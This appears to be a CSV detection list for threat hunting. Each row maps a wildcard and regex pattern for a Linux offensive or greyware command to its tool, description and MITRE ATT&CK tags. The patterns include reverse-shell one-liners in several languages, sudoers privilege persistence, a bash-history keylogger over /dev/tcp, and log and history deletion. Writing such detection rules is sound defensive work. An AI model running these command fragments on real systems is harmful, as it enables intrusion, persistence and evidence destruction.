"*echo *%sudo  ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*",".{0,1000}echo\s.{0,1000}\%sudo\s\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*PEzor.sh -*",".{0,1000}PEzor\.sh\s\-.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*PEzor.sh *.bin*",".{0,1000}PEzor\.sh\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*PEzor.sh -32*",".{0,1000}PEzor\.sh\s\-32.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*PEzor.sh -64*",".{0,1000}PEzor\.sh\s\-64.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}php\s\-r\s.{0,1000}\$sock\=fsockopen\(.{0,1000}exec\(.{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*php -r \""pcntl_exec('/bin/sh'*",".{0,1000}php\s\-r\s\\\""pcntl_exec\(\'\/bin\/sh\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf file is clean*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf\sfile\sis\sclean.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#linux","N/A","10","2","197","26","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z"
"*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#linux","N/A","7","2","197","26","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z"
"*poc.bash*",".{0,1000}poc\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","#linux","N/A","N/A","3","210","72","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
"*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=NOPASSWD\:\s\/bin\/bash.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*processhider.c*",".{0,1000}processhider\.c.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","714","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z"
"*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*",".{0,1000}PROMPT_COMMAND\=.{0,1000}history\s\-a.{0,1000}\stail\s.{0,1000}\.bash_history\s\>\s\/dev\/tcp\/127\.0\.0\.1\/.{0,1000}","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*pty.spawn(""/bin/sh""* >> /etc/update-motd.d/00-header*",".{0,1000}pty\.spawn\(\""\/bin\/sh\"".{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*",".{0,1000}pyhon3\spoc\.py\s.{0,1000}\scurl\shttp\:\/\/.{0,1000}\/shell\.sh\s\-o\s\/tmp\/shell\.sh.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","0","#linux","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*python -c*socket.socket()*connect*dup2*pty.spawn(""bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*python3 ./exp.py --url http://*",".{0,1000}python3\s\.\/exp\.py\s\-\-url\shttp\:\/\/.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","0","#linux","N/A","N/A","4","394","192","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z"
"*ratchatPT*/bin/bash*",".{0,1000}ratchatPT.{0,1000}\/bin\/bash.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","#linux","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
"* ./tor.keyring *",".{0,1000}\s\.\/tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor","Data Exfiltration","torproject.org","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*rcat c -s bash *",".{0,1000}rcat\sc\s\-s\sbash\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","733","60","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z"
"*rcat connect -s bash*",".{0,1000}rcat\sconnect\s\-s\sbash.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","733","60","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z"
"*require('child_process').exec('nc -e ""/bin/bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*require('child_process').exec('nc -e ""/bin/sh"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""\/bin\/sh\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*require('child_process').exec('nc -e ""bash"" *",".{0,1000}require\(\'child_process\'\)\.exec\(\'nc\s\-e\s\""bash\""\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*restore_signature.sh *.dmp*",".{0,1000}restore_signature\.sh\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#linux","N/A","10","10","1803","240","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z"
"*rm .bash_history*",".{0,1000}rm\s\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","#linux","greyware tool - risks of False positive !","10","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*rm .bash_history*",".{0,1000}rm\s\.bash_history.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm /home/*/.bash_history*",".{0,1000}rm\s\/home\/.{0,1000}\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","#linux","greyware tool - risks of False positive !","10","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*rm /root/.bash_history*",".{0,1000}rm\s\/root\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","#linux","greyware tool - risks of False positive !","10","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*rm /var/log/*.log*",".{0,1000}rm\s\/var\/log\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","rm","deleting log files","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm ~/.bash_history*",".{0,1000}rm\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm -rf .bash_history*",".{0,1000}rm\s\-rf\s\.bash_history.{0,1000}","greyware_tool_keyword","rm","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*rm -rf /bin/netstat*",".{0,1000}rm\s\-rf\s\/bin\/netstat.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#linux","N/A","10","10","246","64","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z"
"*rm -rf ~/.bash_history*",".{0,1000}rm\s\-rf\s\~\/\.bash_history.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#linux","N/A","10","10","246","64","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z"
"*rm -rf ~/.bash_history*",".{0,1000}rm\s\-rf\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","rm","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*/download/v1.1.0/pspy32*",".{0,1000}\/download\/v1\.1\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *",".{0,1000}ruby\s\-rsocket\s.{0,1000}TCPSocket\.open\(.{0,1000}exec\ssprintf.{0,1000}\/bin\/sh\s\-i\s.{0,1000}","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*ruby -rsocket -e'spawn(""/bin/bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*ruby -rsocket -e'spawn(""/bin/sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*ruby -rsocket -e'spawn(""bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*run_kmod.sh netkit.ko netkit*",".{0,1000}run_kmod\.sh\snetkit\.ko\snetkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#linux","N/A","10","1","28","6","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z"
"*run_python.sh client/shell.py*",".{0,1000}run_python\.sh\sclient\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#linux","N/A","10","1","28","6","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z"
"*/download/v1.1.0/pspy64*",".{0,1000}\/download\/v1\.1\.0\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/download/v1.2.0/pspy32*",".{0,1000}\/download\/v1\.2\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/download/v1.2.1/pspy32*",".{0,1000}\/download\/v1\.2\.1\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/sh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\sbash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* cmd""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\scmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* powershell""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spowershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* pwsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* zsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\szsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*Runtime.getRuntime().exec(""bash -c* /dev/tcp/*/*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c.{0,1000}\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*os.dup2(s.fileno*pty.spawn(""/bin/bash*",".{0,1000}s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}os\.dup2\(s\.fileno.{0,1000}pty\.spawn\(\""\/bin\/bash.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z"
